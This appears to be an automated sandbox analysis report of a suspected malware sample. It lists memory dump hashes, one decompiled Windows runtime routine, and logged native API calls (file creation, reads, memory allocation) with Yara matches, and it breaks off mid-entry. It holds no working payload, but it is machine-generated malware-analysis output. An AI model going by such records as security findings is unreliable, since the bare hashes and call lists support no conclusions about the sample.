                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fbe8a81490254254c695589868e0934e8218de0f8365fbbc8afe582e80c59338
                                        • Instruction ID: e79a88f9bb8a60aa33e0ecfb598640b8b8e0d4ca17b9b748266162d23b444c36
                                        • Instruction Fuzzy Hash: 1E90026630100402D30261594414B070049D7D1385F91C07AE1414595D86658963F172
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f76d122ce7be9f6dbf0cb6c8b9f65aebbf8fb75d76ad0e50ac607c8e609aa610
                                        • Instruction ID: 1abb8a3f640030fb22dff1af287bd4d885fcd2505d3ec9cca8b1c392e3e23743
                                        • Instruction Fuzzy Hash: CD90027624100402D34171594404B070049E7D0381F91C07AA0414594E86958A66FAA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1155c9ccffcf9f6bd6c8aa55ed5f46fb1dadea5fe9df6cecf67ce094335c21d7
                                        • Instruction ID: 7f4cec9b39096567df81ef632361cc08baf9239a39b7f446b29e5390e618ddf3
                                        • Instruction Fuzzy Hash: 6A9002A6601140434740B15948049075055E7E1341391C179A04445A0C86A88865E2A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c4800bab32600242227463c11a4642579d462ad42feeee29d1e57986a7c63ec3
                                        • Instruction ID: 0a88a020fb441a778ce854d5034dac6311e11e44891435df434062e02c0fbfb7
                                        • Instruction Fuzzy Hash: 7E9002A621100042D30461594404B070085D7E1341F51C07AA2144594CC5698C71A165
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 739fe6f86ba2acf54c8f58d8f79f9158c64a401f708ba92c578820ecd8f096c2
                                        • Instruction ID: 3077e85f2908bf6ea6915191f770bf66401143a2216be282fd623ec385c500a0
                                        • Instruction Fuzzy Hash: 5D9002A620140403D34065594804B070045D7D0342F51C079A2054595E8A698C61B175
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dcfbde854c686553d6c66d8a93b21763d9b827c356070b80d4a45ba47bd4773c
                                        • Instruction ID: b64abb2e699601d350cc0bfdb5add1cdf7154a95177020c7591d1db6c7421990
                                        • Instruction Fuzzy Hash: 5F90026620144442D34062594804F0F4145D7E1342F91C07DA4146594CC9558865A761
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dd7935724888bfd2054403764cfbe47ed2abe0e20595e8261b41811dcbde0b0e
                                        • Instruction ID: a31203a41735970de68a4fba630e0b7ee28a66027c4bb02857b50663766ef183
                                        • Instruction Fuzzy Hash: FE90027620140402D30061594808B470045D7D0342F51C079A5154595E86A5C8A1B571
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 534e64132a5b3afff459a488d1fc3f3755335302b9e177de12a62fa964144476
                                        • Instruction ID: 651833b03914b5c53542579425df5f15fd749c4c7d43ffaf3c7bb5e0cbaa3e13
                                        • Instruction Fuzzy Hash: 0B90027620144002D34071598444B0B5045E7E0341F51C479E0415594C86558866E261
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 99eca672b0f1a3d78399833d2f4d6fb59c7a2f32db02424a6efcee03efcfb805
                                        • Instruction ID: 9d6bdb450fa2bf466091469efdc32f453ca5507849b9a3be5ad458e5036fe5d3
                                        • Instruction Fuzzy Hash: E790026624100802D34071598414B070046D7D0741F51C079A0014594D86568975B6F1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e971ae29bba25ac7ec8005acc4d29fda077dd2f54a94b5c38afd7603cc7faed4
                                        • Instruction ID: c38428692b4c8932a69b83c711c649dbb76eaa6779687f208e5aa72cc3133192
                                        • Instruction Fuzzy Hash: E390027620100802D30461594804B870045D7D0341F51C079A6014695E96A588A1B171
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 177c34b8bf86a0e78d08908eae50ccb46a24927e0851e39b5c514783eed908bb
                                        • Instruction ID: a9d99f3fa41b712ef7fcbff13e593258bd616d2fcb54cba41e07325530310086
                                        • Instruction Fuzzy Hash: 33900276A0500012934071594814B474046E7E0781B55C079A0504594C89948A65A3E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e0c969a1f55c3ffbc05877529d8d1d4d6a3fa39a451fa6890797bc96791e0488
                                        • Instruction ID: f477e714e36d13f2f3da79b3548e223b48a5e2cbbd1bf9fe16ad2bfe2e84ae81
                                        • Instruction Fuzzy Hash: 5D9002E6201140924700A2598404F0B4545D7E0341B51C07EE10445A0CC5658861E175
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 586edecdc378cedf357ed40879afa023885f3ed0979f99fdd26602509a6ed215
                                        • Instruction ID: 33b5f2ce322f4f2c08897a7d455c20caf8d4596374250e937726e5239b8d4f7d
                                        • Instruction Fuzzy Hash: BA90026A221000020345A5590604A0B0485E7D6391391C07DF14065D0CC6618875A361
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5e4683591605a80bbb8d27304f6117fe7bf883e3a9ecc2011f7e8cdd2cfbc25a
                                        • Instruction ID: 92c4028f59ee69c40a295a6a97ee660cf3186dc7e4fa1d33a912768982b4f1c2
                                        • Opcode Fuzzy Hash: 5e4683591605a80bbb8d27304f6117fe7bf883e3a9ecc2011f7e8cdd2cfbc25a
                                        • Instruction Fuzzy Hash: 0B90027620100842D30061594404F470045D7E0341F51C07EA0114694D8655C861B561
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 680ee6a5d7d39420bf11d37bce279d17448295edb457cb8f4768494cfdc0e25a
                                        • Instruction ID: be25e5c4716303fd3021160bdf47f783a18c7e06ad6a801563c2612401f4f972
                                        • Opcode Fuzzy Hash: 680ee6a5d7d39420bf11d37bce279d17448295edb457cb8f4768494cfdc0e25a
                                        • Instruction Fuzzy Hash: 4D90027660500802D35071594414B470045D7D0341F51C079A0014694D87958A65B6E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4c5310e93e42c7f882dbd8764213c9eb181d31ddd1e21ad5ddb1444b8cbf66ee
                                        • Instruction ID: e97a43305439af14265971fb3c07bdca49c9d9e6a736d66e67a3e20a77fdde50
                                        • Opcode Fuzzy Hash: 4c5310e93e42c7f882dbd8764213c9eb181d31ddd1e21ad5ddb1444b8cbf66ee
                                        • Instruction Fuzzy Hash: 0690027620504842D34071594404F470055D7D0345F51C079A00546D4D96658D65F6A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2473b77937ddf5f33d0cd403df53d6683f9fc86465189e124c3606500ba12423
                                        • Instruction ID: b7d0b2a0bd9819ee9da21c821f24c81b1d605ef44bfd26e96fed5f34496cc2da
                                        • Opcode Fuzzy Hash: 2473b77937ddf5f33d0cd403df53d6683f9fc86465189e124c3606500ba12423
                                        • Instruction Fuzzy Hash: C290027631114402D31061598404B070045D7D1341F51C479A0814598D86D588A1B162
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 21520a71333705543b09021f04145a2d10290953f66906fe2839ba2f7aef8ae7
                                        • Instruction ID: a61d2a53563824519627efc85ad4c0db1bb45f09cef1edecf93ae7dab6313802
                                        • Opcode Fuzzy Hash: 21520a71333705543b09021f04145a2d10290953f66906fe2839ba2f7aef8ae7
                                        • Instruction Fuzzy Hash: D590026660500402D34071595418B070055D7D0341F51D079A0014594DC6998A65B6E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b2018db4d25046c0953abda36a81c894e59b97368f65d9fc54a52cae75fbad68
                                        • Instruction ID: 45d2fe921f523c23144de3ef4f41b879abd53680c618d0052577a312b2a198ee
                                        • Opcode Fuzzy Hash: b2018db4d25046c0953abda36a81c894e59b97368f65d9fc54a52cae75fbad68
                                        • Instruction Fuzzy Hash: 26900276301000529700A6995804F4B4145D7F0341B51D07DA4004594C85948871A161
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 605e7563c92a6d711002c4c038901bc761106c1aa3a2af8a4ef5f0d7473cd921
                                        • Instruction ID: e9c822acb9256be3a40a5db63a9b5a358cdf9d5bdc2772d192825e7824239ccf
                                        • Opcode Fuzzy Hash: 605e7563c92a6d711002c4c038901bc761106c1aa3a2af8a4ef5f0d7473cd921
                                        • Instruction Fuzzy Hash: 7D90026620504442D30065595408F070045D7D0345F51D079A10545D5DC6758861F171
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9a4d19a47d3f00ff9e000d23a513118cfffd98901bd7e5cd91a81484db823309
                                        • Instruction ID: c363406fc4fdcd69ff15fdd872d77787ca0e21eece79776c489d52d139124f8e
                                        • Opcode Fuzzy Hash: 9a4d19a47d3f00ff9e000d23a513118cfffd98901bd7e5cd91a81484db823309
                                        • Instruction Fuzzy Hash: F190027A20504442D70065595804F870045D7D0345F51D479A04145DCD86948871F161
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 948d3ca7d9d8e59cea7e92569ca4233219ba18d3065474a3fa1ca69cb02ecb6c
                                        • Instruction ID: 80124537deb6d8650f16e5d295dc4697591f1e2912671dc881a1876248411879
                                        • Opcode Fuzzy Hash: 948d3ca7d9d8e59cea7e92569ca4233219ba18d3065474a3fa1ca69cb02ecb6c
                                        • Instruction Fuzzy Hash: 0690027620100403D30061595508B070045D7D0341F51D479A0414598DD6968861B161
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                        • Instruction ID: 487184c4eede38b97deeca628c3cb9a0c26a1d92e5f2a5a4edbc361baaddb6f5
                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                        • Instruction Fuzzy Hash:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 53%
                                        			E00C0FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                        				void* _t7;
                                        				intOrPtr _t9;
                                        				intOrPtr _t10;
                                        				intOrPtr* _t12;
                                        				intOrPtr* _t13;
                                        				intOrPtr _t14;
                                        				intOrPtr* _t15;
                                        
                                        				_t13 = __edx;
                                        				_push(_a4);
                                        				_t14 =  *[fs:0x18];
                                        				_t15 = _t12;
                                        				_t7 = E00BBCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                        				_push(_t13);
                                        				E00C05720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                        				_t9 =  *_t15;
                                        				if(_t9 == 0xffffffff) {
                                        					_t10 = 0;
                                        				} else {
                                        					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                        				}
                                        				_push(_t10);
                                        				_push(_t15);
                                        				_push( *((intOrPtr*)(_t15 + 0xc)));
                                        				_push( *((intOrPtr*)(_t14 + 0x24)));
                                        				return E00C05720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                        			}

                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C0FDFA
                                        Strings
                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00C0FE2B
                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00C0FE01
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                        • API String ID: 885266447-3903918235
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Executed Functions

                                        APIs
                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00D64B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00D64B87,007A002E,00000000,00000060,00000000,00000000), ref: 00D69DAD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID: .z`
                                        • API String ID: 823142352-1441809116
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00D64B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00D64B87,007A002E,00000000,00000060,00000000,00000000), ref: 00D69DAD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID: .z`
                                        • API String ID: 823142352-1441809116
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • NtReadFile.NTDLL(00D64D42,5EB6522D,FFFFFFFF,00D64A01,?,?,00D64D42,?,00D64A01,FFFFFFFF,5EB6522D,00D64D42,?,00000000), ref: 00D69E55
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • NtReadFile.NTDLL(00D64D42,5EB6522D,FFFFFFFF,00D64A01,?,?,00D64D42,?,00D64A01,FFFFFFFF,5EB6522D,00D64D42,?,00000000), ref: 00D69E55
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • NtReadFile.NTDLL(00D64D42,5EB6522D,FFFFFFFF,00D64A01,?,?,00D64D42,?,00D64A01,FFFFFFFF,5EB6522D,00D64D42,?,00000000), ref: 00D69E55
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00D52D11,00002000,00003000,00000004), ref: 00D69F79
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateMemoryVirtual
                                        • String ID:
                                        • API String ID: 2167126740-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • NtClose.NTDLL(00D64D20,?,?,00D64D20,00000000,FFFFFFFF), ref: 00D69EB5
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp, Offset: 03840000, based on PE: true
                                        • Associated: 00000004.00000002.915122654.000000000395B000.00000040.00000001.sdmp
                                        • Associated: 00000004.00000002.915130424.000000000395F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp, Offset: 03840000, based on PE: true
                                        • Associated: 00000004.00000002.915122654.000000000395B000.00000040.00000001.sdmp
                                        • Associated: 00000004.00000002.915130424.000000000395F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp, Offset: 03840000, based on PE: true
                                        • Associated: 00000004.00000002.915122654.000000000395B000.00000040.00000001.sdmp
                                        • Associated: 00000004.00000002.915130424.000000000395F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp, Offset: 03840000, based on PE: true
                                        • Associated: 00000004.00000002.915122654.000000000395B000.00000040.00000001.sdmp
                                        • Associated: 00000004.00000002.915130424.000000000395F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp, Offset: 03840000, based on PE: true
                                        • Associated: 00000004.00000002.915122654.000000000395B000.00000040.00000001.sdmp
                                        • Associated: 00000004.00000002.915130424.000000000395F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp, Offset: 03840000, based on PE: true
                                        • Associated: 00000004.00000002.915122654.000000000395B000.00000040.00000001.sdmp
                                        • Associated: 00000004.00000002.915130424.000000000395F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 933d22cb60d7b467397588c66649740169b08c9221a5968d792b9a9ab1dc43cb
                                        • Instruction ID: b8d8572c139973f19cce58cd5c547d3b19cbaf722d99e452b3daa0b8f0e81de2
                                        • Opcode Fuzzy Hash: 933d22cb60d7b467397588c66649740169b08c9221a5968d792b9a9ab1dc43cb
                                        • Instruction Fuzzy Hash: 4B90026921304513D1C0B599541864A0015D7D1242F91D465A1109678CCA55986D6361
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp, Offset: 03840000, based on PE: true
                                        • Associated: 00000004.00000002.915122654.000000000395B000.00000040.00000001.sdmp
                                        • Associated: 00000004.00000002.915130424.000000000395F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 4ce14a16a8a024783135b1f902e191c5ced73721073716a8413abab4a31a6b22
                                        • Instruction ID: 963fa82149e2ad9ed0c41913b3e37558d12a794b1ef45a799d86dd5265020ada
                                        • Opcode Fuzzy Hash: 4ce14a16a8a024783135b1f902e191c5ced73721073716a8413abab4a31a6b22
                                        • Instruction Fuzzy Hash: F290027131118913D150A59984147460015D7D1241F51C461A1918678DC7D598997162
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp, Offset: 03840000, based on PE: true
                                        • Associated: 00000004.00000002.915122654.000000000395B000.00000040.00000001.sdmp
                                        • Associated: 00000004.00000002.915130424.000000000395F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 5c5dced871d6717c989797675cf82eabe3bedd3cc78831e4ef0ca916a153d651
                                        • Instruction ID: a29db3af1e67d0090301b971e7346f1dcaf03f0a3d2ced0486b3708762de8655
                                        • Opcode Fuzzy Hash: 5c5dced871d6717c989797675cf82eabe3bedd3cc78831e4ef0ca916a153d651
                                        • Instruction Fuzzy Hash: 4C90027120104913D140A9D954186860015D7E0341F51D061A6118675EC7A598997171
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp, Offset: 03840000, based on PE: true
                                        • Associated: 00000004.00000002.915122654.000000000395B000.00000040.00000001.sdmp
                                        • Associated: 00000004.00000002.915130424.000000000395F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 3b45cf431b40c094419ad98cdf91ceef5fef3963a5b8cc439f4c7fa85d8f4b5e
                                        • Instruction ID: 4c57bfb5ce3644b966c2e2cfb336ce39de9aee7fef2b0c3c85098483b6d40ae5
                                        • Opcode Fuzzy Hash: 3b45cf431b40c094419ad98cdf91ceef5fef3963a5b8cc439f4c7fa85d8f4b5e
                                        • Instruction Fuzzy Hash: A690027120104D53D140A5994414B860015D7E0341F51C066A1218774DC755D8597561
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp, Offset: 03840000, based on PE: true
                                        • Associated: 00000004.00000002.915122654.000000000395B000.00000040.00000001.sdmp
                                        • Associated: 00000004.00000002.915130424.000000000395F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 1fa8c5528611977f81c69929cb30e13d8f42a62f4b174b1b696b0bd1ec679128
                                        • Instruction ID: 249265c4c240eb911a0cc1c29ae9d6c4a61d3c84c56c7fea1e814ae23d178019
                                        • Opcode Fuzzy Hash: 1fa8c5528611977f81c69929cb30e13d8f42a62f4b174b1b696b0bd1ec679128
                                        • Instruction Fuzzy Hash: E59002712010CD13D150A599841478A0015D7D0341F55C461A5518778DC7D598997161
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp, Offset: 03840000, based on PE: true
                                        • Associated: 00000004.00000002.915122654.000000000395B000.00000040.00000001.sdmp
                                        • Associated: 00000004.00000002.915130424.000000000395F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 6a67b8e336cec366fc4c47693612b5596330525094caa88c25ec3dd05344d534
                                        • Instruction ID: 68f7c10e30862ba2404d770a5342fe734a4838ed301b2811fd90a830115a1ffa
                                        • Opcode Fuzzy Hash: 6a67b8e336cec366fc4c47693612b5596330525094caa88c25ec3dd05344d534
                                        • Instruction Fuzzy Hash: F690027120508D53D180B5994414A860025D7D0345F51C061A11587B4DD7659D5DB6A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp, Offset: 03840000, based on PE: true
                                        • Associated: 00000004.00000002.915122654.000000000395B000.00000040.00000001.sdmp
                                        • Associated: 00000004.00000002.915130424.000000000395F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: ead532bd44fcdd0600a27f7e6a7149a8cc6171ba7bb33831cc4e545f726fc803
                                        • Instruction ID: 581b615f4b2666b95767b642210f016d59551d759eaef02d4d65be7b07ac6bc0
                                        • Opcode Fuzzy Hash: ead532bd44fcdd0600a27f7e6a7149a8cc6171ba7bb33831cc4e545f726fc803
                                        • Instruction Fuzzy Hash: 3F90027120104D13D1C0B599441468A0015D7D1341F91C065A1119774DCB559A5D77E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp, Offset: 03840000, based on PE: true
                                        • Associated: 00000004.00000002.915122654.000000000395B000.00000040.00000001.sdmp
                                        • Associated: 00000004.00000002.915130424.000000000395F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 7403f2acc01ffc903747f9ad7c4c0f66e784e99171c38e606e70ab9631e75841
                                        • Instruction ID: e5a3c7d68842e3fbf6c15b5354605de81b5d19ea73d82a5c9b9f7c023f605180
